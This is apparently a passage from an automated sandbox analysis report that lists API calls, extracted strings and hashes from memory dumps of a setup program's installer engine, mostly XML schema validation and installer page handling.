                                                              • __EH_prolog3.LIBCMT ref: 6C922944
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C922677: __EH_prolog3.LIBCMT ref: 6C92267E
                                                                • Part of subcall function 6C91838A: __EH_prolog3.LIBCMT ref: 6C918391
                                                                • Part of subcall function 6C91A378: __EH_prolog3.LIBCMT ref: 6C91A37F
                                                              • __CxxThrowException@8.LIBCMT ref: 6C922C00
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$DispatcherExceptionException@8ThrowUser
                                                              • String ID: 8$Blockers$ParameterInfo.xml$StopBlockers$SuccessBlockers$WarnBlockers$schema validation failure: More than 1 Stop Block defined.$schema validation failure: More than 1 Success Block defined.$schema validation failure: More than 1 Warning Block defined.$schema validation failure: Stop blockers has no child node$schema validation failure: Success blockers has no child node$schema validation failure: Warn blockers has no child node$schema validation failure: no valid child element found for 'Blockers' node.
                                                              • API String ID: 3417717588-4180151753
                                                              • Opcode ID: b8ea3dbfc28cac2a9d7cf94a379098bcb359752c82855810e34e4c170e446f38
                                                              • Instruction ID: fff72e24e359e68767edac71fcb4f7ac8fd031a91e3730b9a8383865cd7c8d11
                                                              • Opcode Fuzzy Hash: b8ea3dbfc28cac2a9d7cf94a379098bcb359752c82855810e34e4c170e446f38
                                                              • Instruction Fuzzy Hash: D9F1B271914249EBCF04CBE8C944ADE7BB9AF25358F148159F024EBF81DB34DA09DB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,6C6227B0,00000000,6C640088), ref: 6C622D01
                                                              • VirtualAlloc.KERNEL32(?,00000000,00001000,00000004,000003F8,00000000,?,?,?,?,6C6227B0,00000000,6C640088), ref: 6C622D4F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303901253.000000006C621000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C620000, based on PE: true
                                                              • Associated: 00000004.00000002.3303864433.000000006C620000.00000002.00000001.01000000.0000000B.sdmp
                                                              • Associated: 00000004.00000002.3303946399.000000006C640000.00000004.00000001.01000000.0000000B.sdmp
                                                              • Associated: 00000004.00000002.3303986988.000000006C641000.00000002.00000001.01000000.0000000B.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c620000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID: Local\SqmData_%s
                                                              • API String ID: 4275171209-1264235261
                                                              • Opcode ID: 561a7edf179f15570037c96137bcea5a5a3cd1752c0e3cb227fad39e7b465604
                                                              • Instruction ID: e84c097a062d5d901b959cd5cd7a63c09675624cceaf1fb70c6ccd1405ab1a2a
                                                              • Opcode Fuzzy Hash: 561a7edf179f15570037c96137bcea5a5a3cd1752c0e3cb227fad39e7b465604
                                                              • Instruction Fuzzy Hash: 28B1E0712042609FDB608F21CC84F5577F5BB01798F20E4A8E99ADBAA1DB35D889CF5C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C91BB43
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • __CxxThrowException@8.LIBCMT ref: 6C91BDEB
                                                              Strings
                                                              • BlockingMutex, xrefs: 6C91BC9D
                                                              • DisabledCommandLineSwitches, xrefs: 6C91BB52
                                                              • ParameterInfo.xml, xrefs: 6C91BD6A
                                                              • schema validation failure: there must be a valid child element for Configuration., xrefs: 6C91BD5C
                                                              • Using Serial Download and Install mechanism, xrefs: 6C91BDFA
                                                              • Using Simultaneous Download and Install mechanism, xrefs: 6C91BE01
                                                              • AdditionalCommandLineSwitches, xrefs: 6C91BBA6
                                                              • FilesInUseSetting, xrefs: 6C91BCEF
                                                              • UserExperienceDataCollection, xrefs: 6C91BBF8
                                                              • DownloadInstallSetting, xrefs: 6C91BC4B
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: AdditionalCommandLineSwitches$BlockingMutex$DisabledCommandLineSwitches$DownloadInstallSetting$FilesInUseSetting$ParameterInfo.xml$UserExperienceDataCollection$Using Serial Download and Install mechanism$Using Simultaneous Download and Install mechanism$schema validation failure: there must be a valid child element for Configuration.
                                                              • API String ID: 2489616738-904804324
                                                              • Opcode ID: 91e8a2fd85492e8ab5ed1faef775e4aa942fae0b4269b81374e3df91a8abdb10
                                                              • Instruction ID: a6322061a8aea3dfa287d25a561168a74795b01d957724eb0a45b9e467470879
                                                              • Opcode Fuzzy Hash: 91e8a2fd85492e8ab5ed1faef775e4aa942fae0b4269b81374e3df91a8abdb10
                                                              • Instruction Fuzzy Hash: 6BA15FB1904209EFDB04DFA8C945AEEBBB9BF29318F144555F425E7B80C734EA04CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetParent.USER32(?), ref: 6C49D38D
                                                                • Part of subcall function 6C48E153: GetWindowLongW.USER32(?,000000F0), ref: 6C48E179
                                                                • Part of subcall function 6C48E153: GetParent.USER32 ref: 6C48E18B
                                                                • Part of subcall function 6C48E153: GetWindowRect.USER32(?,?), ref: 6C48E1A5
                                                                • Part of subcall function 6C48E153: GetWindowLongW.USER32(?,000000F0), ref: 6C48E1BB
                                                                • Part of subcall function 6C48E153: MonitorFromWindow.USER32(?,00000002), ref: 6C48E1DA
                                                              • SetWindowTextW.USER32(?,?), ref: 6C49D3A3
                                                                • Part of subcall function 6C49D149: __EH_prolog3.LIBCMT ref: 6C49D150
                                                                • Part of subcall function 6C49D149: LoadImageW.USER32(00000000,?,00000001,00000020,00000020,00000010), ref: 6C49D198
                                                                • Part of subcall function 6C49D149: SendMessageW.USER32(?,00000080,00000001,00000000), ref: 6C49D1AF
                                                                • Part of subcall function 6C49D149: LoadImageW.USER32(00000000,?,00000001,00000020,00000020,00000010), ref: 6C49D1E4
                                                                • Part of subcall function 6C49D149: GetDlgItem.USER32(?,00000068), ref: 6C49D1F5
                                                                • Part of subcall function 6C49D149: SendMessageW.USER32(00000000,00000170,?,00000000), ref: 6C49D209
                                                                • Part of subcall function 6C49D149: LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 6C49D231
                                                                • Part of subcall function 6C49D149: GetDlgItem.USER32(?,00000069), ref: 6C49D242
                                                                • Part of subcall function 6C49D149: SendMessageW.USER32(00000000,000000F7,00000001,?), ref: 6C49D256
                                                                • Part of subcall function 6C49D149: LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 6C49D27E
                                                                • Part of subcall function 6C49D073: __EH_prolog3.LIBCMT ref: 6C49D07A
                                                                • Part of subcall function 6C49D073: SetDlgItemTextW.USER32(?,00000065,?), ref: 6C49D130
                                                              • GetDlgItem.USER32(?,00000066), ref: 6C49D3B9
                                                                • Part of subcall function 6C490B11: SetWindowLongW.USER32(?,000000FC,?), ref: 6C490B2D
                                                              • SendMessageW.USER32(?,00000445,00000000,04000000), ref: 6C49D3E4
                                                                • Part of subcall function 6C49D86C: _memset.LIBCMT ref: 6C49D8B6
                                                                • Part of subcall function 6C49D86C: SendMessageW.USER32(?,0000043A,00000001,?), ref: 6C49D8D9
                                                              • SendMessageW.USER32(?,000000CF,00000001,00000000), ref: 6C49D3FC
                                                                • Part of subcall function 6C49CFA5: __EH_prolog3.LIBCMT ref: 6C49CFAC
                                                                • Part of subcall function 6C49CFA5: GetDlgItem.USER32(?,00000067), ref: 6C49D018
                                                                • Part of subcall function 6C49CFA5: SetWindowLongW.USER32(?,000000FC,?), ref: 6C49D041
                                                                • Part of subcall function 6C49CFA5: SetDlgItemTextW.USER32(?,00000067,?), ref: 6C49D05A
                                                                • Part of subcall function 6C49D2BF: __EH_prolog3.LIBCMT ref: 6C49D2C6
                                                                • Part of subcall function 6C49D2BF: SetDlgItemTextW.USER32(?,0000000B,00000000), ref: 6C49D2FC
                                                                • Part of subcall function 6C49D2BF: SetDlgItemTextW.USER32(?,00000008,00000000), ref: 6C49D33B
                                                              • GetDlgItem.USER32(?,0000000B), ref: 6C49D424
                                                              • KiUserCallbackDispatcher.NTDLL(00000000,00000000), ref: 6C49D42D
                                                              • GetDlgItem.USER32(?,00000069), ref: 6C49D482
                                                              • GetDlgItem.USER32(?,0000006A), ref: 6C49D4D5
                                                              • PostMessageW.USER32(?,000006F5,00000000,00000000), ref: 6C49D53E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Item$MessageWindow$Send$Text$H_prolog3ImageLoadLong$Parent$CallbackDispatcherFromMonitorPostRectUser_memset
                                                              • String ID: IDS_PRINT$IDS_SAVE
                                                              • API String ID: 3208048787-3437764585
                                                              • Opcode ID: 433fb32cd25b2a1191a81353e15a54faa5ddd37d1812f52a3a72e5629ab43b48
                                                              • Instruction ID: 688476a0a203159ed0cab55fc27741d7d3f7929e56ef35ee47fc5d9f0316bd04
                                                              • Opcode Fuzzy Hash: 433fb32cd25b2a1191a81353e15a54faa5ddd37d1812f52a3a72e5629ab43b48
                                                              • Instruction Fuzzy Hash: C5513875604201AFDB10DF64C884F5ABBE5FF8A318F000A1DF555AB7A0DB71E8188B92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C917882
                                                              • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\PCHealth\ErrorReporting\DW\Installed,00000000,00020019,?,00000014,6C91781A,?,6C94831D,00000000), ref: 6C9178B2
                                                              • RegQueryValueExW.ADVAPI32(?,DW0200,00000000,00000000,?,?,?,6C94831D,00000000), ref: 6C9178D8
                                                              • RegCloseKey.ADVAPI32(?,?,6C94831D,00000000), ref: 6C9178E4
                                                              • GetFileAttributesW.KERNEL32(?,?,6C94831D,00000000), ref: 6C9178F9
                                                              • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,?,?,6C94831D,00000000), ref: 6C91790E
                                                              • GetFileAttributesW.KERNEL32(?,?,6C94831D,00000000), ref: 6C917931
                                                              • GetFileAttributesW.KERNEL32(?,?,6C94831D,00000000), ref: 6C91798A
                                                              Strings
                                                              • Software\Microsoft\PCHealth\ErrorReporting\DW\Installed, xrefs: 6C9178A8
                                                              • DW0200, xrefs: 6C9178C9
                                                              • DW\DW20.exe, xrefs: 6C91795E
                                                              • \Microsoft Shared\DW\DW20.exe, xrefs: 6C91791D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile$CloseFolderH_prolog3OpenPathQueryValue
                                                              • String ID: DW0200$DW\DW20.exe$Software\Microsoft\PCHealth\ErrorReporting\DW\Installed$\Microsoft Shared\DW\DW20.exe
                                                              • API String ID: 2337823764-2373061612
                                                              • Opcode ID: 218b4757838623ec9dc3a263c66aba6c7fd289992b22be7525f29942c8ffc99b
                                                              • Instruction ID: 60de010e2db5edcc0610249d1ebbecb2b84d64b03a5bedde2f85a9be0a0c1bb4
                                                              • Opcode Fuzzy Hash: 218b4757838623ec9dc3a263c66aba6c7fd289992b22be7525f29942c8ffc99b
                                                              • Instruction Fuzzy Hash: 2D31857191020EAFEF108BA4CC85EBFB67DBF1535DF100625E520A6A90D734C915DBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C48D92A
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                              • PathIsRelativeW.SHLWAPI(00000000,00000000,?,00000000,00000008,6C49E271,00000000,?,?,00000DF0,?,?), ref: 6C48D960
                                                              • GetModuleFileNameW.KERNEL32(00000010,00000104,?,00000000,00000008,6C49E271,00000000,?,?,00000DF0,?,?), ref: 6C48D9BA
                                                              • PathCombineW.SHLWAPI(?,?,?,00000000,?,00000000,00000008,6C49E271,00000000,?,?,00000DF0,?,?), ref: 6C48DA0D
                                                              • __CxxThrowException@8.LIBCMT ref: 6C48DAAF
                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,00000000,00000002,?,80000000,00000001,00000003,00000080,00000000,00000000), ref: 6C48DAD0
                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 6C48DB07
                                                              • ReadFile.KERNEL32(?,?,?,?,00000000,?,00000000,00000008,6C49E271,00000000,?,?,00000DF0,?,?), ref: 6C48DB38
                                                              • FindCloseChangeNotification.KERNEL32(?,?,00000000,00000008,6C49E271,00000000,?,?,00000DF0,?,?), ref: 6C48DBB5
                                                              Strings
                                                              • Could not find mandatory data file %s. This is a bad package., xrefs: 6C48DB6E
                                                              • ReadXML failed to open XML file %s, with error %d, xrefs: 6C48DA8B
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: File$H_prolog3Path$AllocChangeCloseCombineException@8FindModuleNameNotificationPointerReadRelativeStringThrow
                                                              • String ID: Could not find mandatory data file %s. This is a bad package.$ReadXML failed to open XML file %s, with error %d
                                                              • API String ID: 1788304661-4172873023
                                                              • Opcode ID: 990406dab4b27e2d5ebf923fc362511731fd95592e3bd9f1ff3fdb47f15a2906
                                                              • Instruction ID: 914a7fc7e64f2ae1dcd411e9a6cc5502b3d85309a72b298912c11b72680fbc89
                                                              • Opcode Fuzzy Hash: 990406dab4b27e2d5ebf923fc362511731fd95592e3bd9f1ff3fdb47f15a2906
                                                              • Instruction Fuzzy Hash: 70912671902159AFCF00DFA8C885EDEBBB5EF09724F14461AE911B7790D734AA168BA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C92539D
                                                              • SysFreeString.OLEAUT32(?), ref: 6C925420
                                                              • SysAllocString.OLEAUT32(6C94FA6E), ref: 6C925490
                                                              • __EH_prolog3.LIBCMT ref: 6C9254B8
                                                              • __CxxThrowException@8.LIBCMT ref: 6C925540
                                                                • Part of subcall function 6C918415: __EH_prolog3.LIBCMT ref: 6C91841C
                                                                • Part of subcall function 6C91A378: __EH_prolog3.LIBCMT ref: 6C91A37F
                                                              Strings
                                                              • \LocalizedData.xml: should have atleast one 'Language' child element!, xrefs: 6C925599
                                                              • ParameterInfo.xml, xrefs: 6C925565
                                                              • Unable to find Language element for LangID="%d" in localized data, xrefs: 6C92551A
                                                              • //Setup/LocalizedData/Language, xrefs: 6C9253CC
                                                              • W, xrefs: 6C925530
                                                              • Schema validation failure in file , xrefs: 6C925575
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$String$AllocException@8FreeThrow
                                                              • String ID: //Setup/LocalizedData/Language$ParameterInfo.xml$Schema validation failure in file $Unable to find Language element for LangID="%d" in localized data$W$\LocalizedData.xml: should have atleast one 'Language' child element!
                                                              • API String ID: 191698298-1863159554
                                                              • Opcode ID: ec7f8616d13e480a2c09ac4cd12884008c2fd0625811f6ea30ed586fdc806f60
                                                              • Instruction ID: 6e7e568515162efc3d8d36c2be25c73de027fba2101afa8c668873dff5f4846c
                                                              • Opcode Fuzzy Hash: ec7f8616d13e480a2c09ac4cd12884008c2fd0625811f6ea30ed586fdc806f60
                                                              • Instruction Fuzzy Hash: 3F919F71901209EFDB04CFE8C984AEDBBB9BF29318F244559E154EBB84C734DA09CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3_catch.LIBCMT ref: 6C934746
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C948380: __EH_prolog3.LIBCMT ref: 6C948387
                                                                • Part of subcall function 6C91388B: __EH_prolog3.LIBCMT ref: 6C913892
                                                                • Part of subcall function 6C934464: __EH_prolog3.LIBCMT ref: 6C93446B
                                                                • Part of subcall function 6C934682: __EH_prolog3.LIBCMT ref: 6C934689
                                                              • CoInitialize.OLE32(00000000), ref: 6C9347F7
                                                              • CoCreateInstance.OLE32(6C90A974,00000000,00000017,6C90A9A4,?,?,?,?,?,6C913864,?,00000000,00000000,6C94FA6E,00000738,IronMan::EngineData::CreateEngineData), ref: 6C934815
                                                                • Part of subcall function 6C959D05: GetCommandLineW.KERNEL32(512AC3CC,?,00000000,ParameterInfo.xml,?,?,?,00000000,?,?,?,?,ParameterInfo.xml,?,00000000,?), ref: 6C959D54
                                                              • CoUninitialize.OLE32(?,02642228,00000000,?,?,succeeded,6C90A794,?,?,?,?,6C913864,?,00000000,00000000,6C94FA6E), ref: 6C9348ED
                                                              • SysFreeString.OLEAUT32(00000000), ref: 6C9348F9
                                                              • SysAllocString.OLEAUT32(?), ref: 6C93492E
                                                              • __CxxThrowException@8.LIBCMT ref: 6C9349BE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$String$AllocCommandCreateException@8FreeH_prolog3_catchInitializeInstanceLineThrowUninitialize
                                                              • String ID: IronMan::EngineData::CreateEngineData$ParameterInfo.xml$succeeded$threw exception
                                                              • API String ID: 1482071144-3644667230
                                                              • Opcode ID: 828047b5277690716dabc727ea1245e64947232b4467f96400debb1b5c054e3a
                                                              • Instruction ID: 3167a8fb879ecbb2b80e9e265fb31b314beab4301681aca7f47f5d4a119205c3
                                                              • Opcode Fuzzy Hash: 828047b5277690716dabc727ea1245e64947232b4467f96400debb1b5c054e3a
                                                              • Instruction Fuzzy Hash: 23817B70900249EFCF01DFA8C888ADE7BB9AF69718F148559F518EBB41C775DA05CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C4A6EE9
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                                • Part of subcall function 6C4931A0: __EH_prolog3.LIBCMT ref: 6C4931A7
                                                                • Part of subcall function 6C4931A0: _wcschr.LIBCMT ref: 6C4931E8
                                                                • Part of subcall function 6C4931A0: __CxxThrowException@8.LIBCMT ref: 6C4932A2
                                                                • Part of subcall function 6C4931A0: PathIsRelativeW.SHLWAPI(00000000,?,00000000,00000028,6C4A6F33,?,?,00000000,00000044,6C4A668B,?,00000000,00000000,?,?,succeeded), ref: 6C4932B9
                                                                • Part of subcall function 6C4931A0: PathFileExistsW.SHLWAPI(00000000,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6C49E271,00000000), ref: 6C4932C6
                                                                • Part of subcall function 6C4945DE: __EH_prolog3.LIBCMT ref: 6C4945E5
                                                                • Part of subcall function 6C4960C9: __EH_prolog3.LIBCMT ref: 6C4960D0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Path$Exception@8ExistsFileRelativeThrow_wcschr
                                                              • String ID: ?$EulaPage$FinishPage$MaintenanceModePage$ProgressPage$ResourceDll$SystemRequirementsPage$WelcomePage$Windows
                                                              • API String ID: 1182493169-944454811
                                                              • Opcode ID: a5b93a495c0b120cf66a3d61a65dd8a031956f3c4f62e48e5eefe0e25b63b7cd
                                                              • Instruction ID: aae9e91e22a6e208dcc94cb59e40db467ab5c3631a43e110ca0e2c65569c6370
                                                              • Opcode Fuzzy Hash: a5b93a495c0b120cf66a3d61a65dd8a031956f3c4f62e48e5eefe0e25b63b7cd
                                                              • Instruction Fuzzy Hash: 47F1667190118DEFDB00DBE8C984FDEBBB8AF19218F184199E114E7785DB34DA0ADB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C934AE0
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C9189B7: __EH_prolog3.LIBCMT ref: 6C9189BE
                                                                • Part of subcall function 6C9189B7: __CxxThrowException@8.LIBCMT ref: 6C918A89
                                                              • __CxxThrowException@8.LIBCMT ref: 6C934E3F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: Blockers$Configuration$EnterMaintenanceModeIf$Items$ParameterInfo.xml$Setup$SystemCheck$schema validation failure: wrong number of child elements under top level Setup element
                                                              • API String ID: 2489616738-3586895666
                                                              • Opcode ID: ec5cf46bc01dd54da32c5aaea851395a79383dd9f0994897380d5c661bb93fa9
                                                              • Instruction ID: 5c292e215224b9b2bde8254d5ce8916d5690ab8099d8b71c7bf6e61aaeea2c65
                                                              • Opcode Fuzzy Hash: ec5cf46bc01dd54da32c5aaea851395a79383dd9f0994897380d5c661bb93fa9
                                                              • Instruction Fuzzy Hash: 96C16F7190424DAFDB04DFA8C945AEEBBB9BF25308F108559F424E7B81C734DA09CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C926447
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C91A1FF: __EH_prolog3_catch.LIBCMT ref: 6C91A206
                                                              • __CxxThrowException@8.LIBCMT ref: 6C926666
                                                                • Part of subcall function 6C91838A: __EH_prolog3.LIBCMT ref: 6C918391
                                                                • Part of subcall function 6C918415: __EH_prolog3.LIBCMT ref: 6C91841C
                                                              Strings
                                                              • schema validation failure: If URL is present then there must be a DownloadSize, xrefs: 6C9265DA
                                                              • URL, xrefs: 6C926453
                                                              • ParameterInfo.xml, xrefs: 6C9265E8, 6C926688
                                                              • schema validation failure: If HashValue is present then it must be a 64 hex-digit string, xrefs: 6C92667A
                                                              • CompressedDownloadSize, xrefs: 6C926571
                                                              • CompressedHashValue, xrefs: 6C92652C
                                                              • HashValue, xrefs: 6C92649E
                                                              • DownloadSize, xrefs: 6C9264E3
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
